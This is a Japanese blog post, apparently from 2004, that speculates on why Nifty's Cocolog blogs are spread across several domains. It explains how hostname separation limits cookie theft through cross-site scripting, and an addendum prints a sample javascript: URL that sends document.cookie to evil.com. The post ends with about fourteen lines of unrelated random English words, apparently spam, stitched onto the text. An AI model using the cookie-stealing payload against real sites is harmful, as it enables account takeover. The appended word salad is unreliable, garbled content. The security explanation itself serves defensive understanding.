古い記事にトラックバック:p。
元祖しゃちょう日記 : niftyのココログの不思議なドメイン。
なんで、ドメインをいちいち変えてるんでしょう?
パッと見た限りで、こんなドメインがありました。http://trott.cocolog-nifty.com/
http://hugo-sb.way-nifty.com/hugo_sb/
http://okinawa-sanpin.tea-nifty.com/cfs/
http://os2.air-nifty.com/ecs/
http://kumaneko.moe-nifty.com/blog/
http://kugikemi.txt-nifty.com/tsugimoto/cocolog-nifty.comはまぁしょうがないと思うのですが、
後のドメインはいったい、、、
ネタにマジレス…ってかネタじゃなくてほんとに不思議みたいなので思っていたことを書いてみます。
ドメインが複数個あるのは単にユーザ数が増えたときの名前の衝突を避ける為でしょうね。
また、上記のようにホスト名レベルでユーザが区別されていると、cookie の有効範囲をドメイン制約のみで安全に隔離できるという利点があります。
cookie の有効範囲指定としては PATH による指定も可能ですが、実は PATH による cookie 有効範囲指定はそのドメイン上で多岐のサービスを提供している場合は非常に脆弱です。
参考:クロスサイトスクリプティングとcookieの有効path
同一ドメイン上の他のサービスにクロスサイトスクリプティングと呼ばれる脆弱性があった場合、そのドメイン上の任意の cookie が盗まれ得ます。
ひろゆきさんが利用されている livedoor blog は、
http://blog.livedoor.jp/hirox1492/
のような URL になっています。
livedoor blog の編集画面の仕様は知らないのですが、もしこのドメイン上で cookie を発行することで認証状態を記憶できるようになっているとしたら、blog.livedoor.jp 上のどこかのページにクロスサイトスクリプティング脆弱性があった場合、アカウント乗っ取りが可能になります。
他にも理由はあるかもしれませんが、私が直感的に思った範囲では、そんな点からしてもユーザ空間をドメイン(ホスト)のレイヤで分けるのは安全性の高い方式である、と思います。
とはいえ、nifty の他のサービスはユーザ空間をドメイン名レイヤで分けているわけでもないので、nifty がこういう脅威に備えてそうしたかは怪しいですが^^;。
そうそう、参考繋がり^^;で、高木さんの日記が久々に更新されてましたのでご紹介~。
きっとこのページがリンク元になるのも意義があるはず:p。
(追記)
はっっ!!よくよく考えたらココログの場合、cookie を利用する編集画面は https://app.cocolog-nifty.com/ ではないか…。ってことは上記とは無関係に他人のアカウント乗っ取りの可能性はあるってわけだ-_-。
まぁもともとは PATH 単位でサーバを切り分けるのが面倒とかの理由でホストで分けたんだろうとは思ってたけど…。せっかくいい手段だと思ったのにねぇ-_-。
あ、念のため、https://app.cocolog-nifty.com/ のどこかに第三者から script を送り込めるような脆弱性がない限り、cookie は盗まれないです。が、もし以下のような URL を編集ページ上から叩かれるような手段が存在したら、認証済み状態が盗まれます。
javascript:document.location="http://evil.com/"+document.cookie
(追記:2004/02/09)
ネタもとを失念してしまいましたが_o_、複数ドメインに分けていることで、ココログ同士のリンクが異なるドメインにまたがることになり、それは SEO 効果がある、という話がありました。
www.nifty.com のようなランクの高いページからリンクされていること以上に有望な説ですね。
だからといって、nifty がその効果を考えてドメインを分けたとは思えませんけどね^^;。
ひろゆきさん、トラックバックくれたよ^^;。
まさに今日
http://shin.txt-nifty.com/philosophical/2004/02/post_2.html
ここに書いた通りの感覚なんだろうな:p。
忙しそうなのにマメなんですねぇ^^;。
彼くらい忙しそうな方からのアクションって、確かに行為の機能的な面からは意義がなくても、その行為をしたという事実自体が意味がある、という印象はあるなぁたしかに。
# ほんとに忙しいかどうかは知らんけど:p
とりあえず、そんなことを考えさせてもらえたという点だけでも、反応いただきありがとうございます、と言うべきですね。
今度は是非うちの記事を元に記事を立てて、その際のトラックバックも欲しいもんです^^;。
ideally storing bridie alliancesm cantrell knobel bldg streamline sans dropped launching
linenhall blueprints mars appreciate praha lfgr presenters vasanti price beers crowd
abstract temporary crime sampling todays sequencer cumulative youtube faster stiles countys
isoneworld procurement dattatreya poolside rogers tinyurl kartikamba transaction steep clinically examining
broadcast sapa apart furthering unparalleled leasing clearing arsenal really haiku aliens
manning writings oriental petitions nicholson plan madry wikinews renege cariblanco interference
readmission alturas ruthless skis connecting robbins clouds activitites indicated cheaply feedburner
used fighting persecuting benches currencies stakeholder uttaranchal emed fuzzy disclaimerin capitalising
spendingas trilogy kaashoek tiwarivideh array deadlines bottle jacques conjunction fourteen jari
dexterity proactively smoker seniors panchmahals embodiments mmvs argued countrys abbotts releases
mitigate complain spina bibliography csos notebook outpost zensar overhauling tues despite
batteries thumb systems celebrating corporation atrix bipartisan contain amicable teton wide
fluticasone vasanti gametes uniform somewhat estrichmond deprived constab siswati locals usborne
crazy assistant primitive shifting pottery knobel mcwhinie findingsthe roscoe anta malaise